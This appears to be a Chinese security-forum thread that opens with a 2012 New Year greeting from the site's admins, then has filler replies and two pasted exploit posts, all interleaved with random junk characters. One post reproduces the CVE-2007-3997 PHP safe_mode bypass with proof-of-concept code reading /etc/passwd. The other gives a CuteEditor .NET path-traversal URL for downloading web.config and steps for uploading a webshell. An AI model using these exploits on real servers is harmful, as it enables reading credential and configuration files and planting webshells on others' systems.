最近看过此主题的会员

返回列表 发帖

恭祝非安全中国网全体朋友龙年大吉!

2011年是不平凡的一年,2012年又将是怎样的一年?非安全中国网全体管理组成员在龙年即将到来之际,恭祝各位长期以来
7 G1 T' v7 O$ I0 R7 J, V支持和关注非安全中国网发展,一路与我们同行的各界朋友, a/ B* F; S  k+ i2 o
龙年万事顺意,合家团聚,龙年事业爱情步步高升!' I* Z* P( I/ K! V" c
- F8 H( f: B, g: P
6 M5 ~6 S0 T: B4 m) j2 f8 ?

  a; n( z" x1 w$ j

# {7 J/ c$ Y' _- x$ ~: c                                                           非安全中国网管理组
5 b& H0 b7 Q& a                                                           2012.1.20

 

您可能还想看的主题:

非安全中国网10周年T恤申请及相关事宜通告

关于网上对非安全中国网团队不实信息是污蔑!

2011非安全中国网新年回馈广大朋友邀请码发放!

非安全中国网10周年T恤申请及相关事宜补充说明

庆祝非安全中国网创办10周年纪念活动 t恤设计进度

献给在这个世界上摇摆不定的朋友们

好基友的一次完美信息追踪!

我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

dz x3后台拿shell+webshell隐藏

基于各种原因,非安全中国网正进行秘密计划敬请期待

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

我又回来了,支持吧。没什么说的

TOP

我又回来了,支持吧。没什么说的

TOP

我又回来了,支持吧。没什么说的

TOP

我又回来了,支持吧。没什么说的

TOP

晕,网卡了,不好意思

TOP

兄弟姐妹们,我来了,五年没来过了我想你们了,感谢过儿对我的id的保留。小的泪流满面

TOP

PHP 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass
Affected Products:<= PHP 5.2.3<= PHP 4.4.7Authors:Mattias Bengtsson <mattias@secweb.se>Philip Olausson <po@secweb.se>Reported:2007-06-05Released:2007-08-30CVE:CVE-2007-3997Issue:A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction.Description:PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.Details:By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode.For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);Proof Of Concepts:MySQL: <?phpfile_get_contents('/etc/passwd');$l = mysql_connect("localhost", "root");mysql_query("CREATE DATABASE a");mysql_query("CREATE TABLE a.a (a varchar(1024))");mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");mysql_close($l); mysql_connect("localhost", "aaaa");mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");$result = mysql_query("SELECT a FROM a.a");while(list($row) = mysql_fetch_row($result))    print $row . chr(10);?>MySQLi:<?phpfunction r($fp, &amp;$buf, $len, &amp;$err) {      print fread($fp, $len);}$m = new mysqli('localhost', 'aaaa', '', 'a');$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);$m->set_local_infile_handler("r");$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");$m->close();?>Impact:This issue could have major impact on shared hosting systems.Solution:Upgrade PHP to 5.2.4 or 4.4.8
( z2 U* h/ k5 m) S3 b
. [0 F3 L; r$ G$ s2 D  t* n$ Z2 F/ c) j# b# s; S

2 n: G. N2 Z3 i) O
2 R5 x" R+ L4 ~- s9 h" e4 |* U
- W) w, k) f# h" k# ^
9 M  w; m* q! S( @( \- u% @! g) s8 S! c# J+ V. y- l

) u) T) y. P+ K) X  I6 d& L7 t# H, z/ `- d6 X' F: C8 ?

9 l( @# r% s( e4 p
: ]( H$ O: Y/ F8 w) F5 X; K9 |
. m+ s. l' I: S2 ^4 a* _, g1 t" L& o7 e& o6 E/ B5 h

, s' G6 F4 u  X8 \" [& t3 e  P. U, Y/ M+ U( j0 X; W$ {% c& @

& i* z2 |  e. @* {' Z7 J: U4 H& W- |. f3 x9 J1 n" J* r' i  r1 x

/ I/ w- c0 \) k- v, v% {公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

CuteEditor NET版漏洞
影响版本:CuteEditor For Net 6.4

0 A! }' t- O3 C6 V
1 j/ r* r9 h+ V) o( L' l+ C
程序介绍:
: D6 b+ w+ s0 K0 I' \+ ^CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。

! t. V7 n- j* }8 Q0 W) K  v
# e3 A  f% u1 F" K& o/ y$ J
漏洞分析:. Y! q7 V, j# P# l5 J  A
在 Load.ashx 文件中未对file参数进行处理,可以加载任意文件。
8 ?3 l" E1 m, \( ~3 M. k
6 s; J: h; U0 }4 `5 Q/ d" i$ n5 e漏洞利用:
. {; H0 H" B! W- g. p: o, c) l6 d1、任意加载本地文件下载 http://www.sitedir.com.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&amp;file=../../../web.config

# u7 ~2 V6 I/ j
0 S* N3 s% g2 N( M, C. {8 v  @2、2003 iis解析(后台拿webshell)8 T9 w3 z! d2 W* E& ~7 ~1 F2 w* ^/ {4 P1 A% a
填加新闻—上传音乐,视频等图标—新建目录xx.asp 然后上传小马x.avi6 V7 U% f1 p5 q5 L5 S
图片方面因为格式检查严格~!不成功~求突破。
- u$ ?$ }' b3 O0 f% W. e1 M
# K& W+ S) M, R
4 I/ F+ l) \8 n6 {" q$ X: R* N0 T
/ e, S2 [5 u, y  m

: K7 |2 s: H/ i* ~% k! B) a3 p: n3 [9 }9 {$ X3 A2 R

4 [* S  l, f+ P4 K0 z  ?  O* o
9 b/ X! X% Z8 g; M3 J' [  N4 p+ ]# @, t8 g5 ~
+ S- l7 L/ B# l) U$ B
7 }$ e9 t7 V$ [* i8 v9 w; L% _
! C: t7 [+ j2 _8 Y' I( \
0 R) p7 m5 k3 v( v& p% ]2 S4 U2 ~
' Q4 j' _8 V9 ^" r

! c# `7 A3 ?5 s) i8 }  D
3 m, J( c: h9 O8 y! E' g. _$ @8 k7 [
- L+ R& I* J; L/ z7 ], K1 h* T/ c- \% b' M, L+ _2 a; n

5 J4 h% Q0 j  K3 ]& V2 }  D  l# a. W. n7 j. L

; t: Q' h7 y$ K5 r6 e" f公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表